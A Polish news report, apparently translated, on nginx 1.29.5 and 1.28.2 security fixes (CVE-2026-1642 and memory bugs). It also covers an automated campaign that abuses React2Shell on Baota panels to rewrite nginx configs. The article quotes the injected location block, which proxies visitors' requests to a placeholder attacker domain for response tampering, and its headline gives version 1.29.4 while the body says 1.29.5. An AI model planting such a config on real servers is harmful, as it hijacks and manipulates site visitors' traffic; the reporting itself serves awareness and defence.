Nginx 1.29.4 z poprawką dla luk bezpieczeństwa. Ataki zmieniające konfigurację nginx celem przekierowania ruchu

Wydano wydanie głównej gałęzi nginx 1.29.5, w ramach którego rozwijane są nowe możliwości, a także wydano równolegle wspieraną stabilną gałąź nginx 1.28.2, do której wprowadzane są jedynie zmiany związane z eliminacją poważnych błędów i podatności. W aktualizacjach usunięto podatność (CVE-2026-1642), która pozwala atakującemu mającemu możliwość przeprowadzenia ataku typu MITM na kanale komunikacyjnym między nginx a serwerem upstream na podmianę odpowiedzi wysyłanych do klienta. Problem dotyczy konfiguracji, które proxyzują zapytania (HTTP 1.x, HTTP/2, gRPC lub uWSGI) do wyższego serwera z użyciem szyfrowania TLS.

Ponadto w wydaniu 1.29.5 poziom logowania błędów SSL 'ech_required' został obniżony z 'crit' do 'info', a także usunięto kilka problemów: usunięto odwołanie do już zwolnionej pamięci (use-after-free) po przełączeniu na kolejny backend gRPC lub HTTP/2; rozwiązano problem z wysłaniem nieprawidłowego zapytania HTTP/2 po przełączeniu na następny serwer upstream; naprawiono problem z rozrastającym się rozmiarem odpowiedzi z wieloma zakresami; poprawiono ustawianie zmiennej HTTP_HOST podczas proxyzowania do backendów FastCGI, SCGI i uwsgi.

Dodatkowo można odnotować wykrycie zautomatyzowanego ataku, który po udanym włamanie serwerów jest ograniczany przez zmianę konfiguracji nginx. Włamanie odbywa się przez niewykrytą podatność React2Shell w komponentach serwera React na systemach z panelami zarządzającymi hostingiem, takimi jak Baota (BT). Wprowadzane w konfiguracji nginx zmiany przekierowywały zapytania do obsługiwanych stron na serwer atakujących, który wprowadzał złośliwe zmiany do odpowiedzi zwracanych użytkownikowi. location /%PATH%/ { set $fullurl "$scheme://$host$request_uri"; rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break; proxy_set_header Host [Attacker_Domain]; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header User-Agent $http_user_agent; proxy_set_header Referer $http_referer; proxy_ssl_server_name on; proxy_pass http://[Attacker_Domain]; }

Zamiast instalacji rootkitów lub złośliwego oprogramowania na serwerze, zorganizowano atak na klientów otwierających obsługiwane na serwerze strony. Atak ten jest przede wszystkim ukierunkowany na przechwytywanie ruchu domen azjatyckich oraz domen *.edu i *.gov. Poprzez serwer atakujących przekierowywane są wybrane zapytania, na przykład zawierające w swoich ścieżkach słowa „pg”, „pgslot”, „slot”, „gra”, „kasyno”, „na żywo”, „pomoc”, „aktualności”, „strona”, „blog”, „o nas”, „wsparcie” i „informacje”. Atak jest przeprowadzany automatycznie z wykorzystaniem narzędzi, które wyszukują i analizują konfigurację nginx, wybierają i podstawiają szablon ustawień, restartują nginx i sprawdzają działanie zmodyfikowanej wersji.

Nginx 1.29.4 z poprawką dla luk bezpieczeństwa. Ataki zmieniające konfigurację nginx celem przekierowania ruchu


Źródło: opennet.ru
Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS 🔥 Kup solidny hosting stron z ochroną przed DDoS, serwery VPS VDS | ProHoster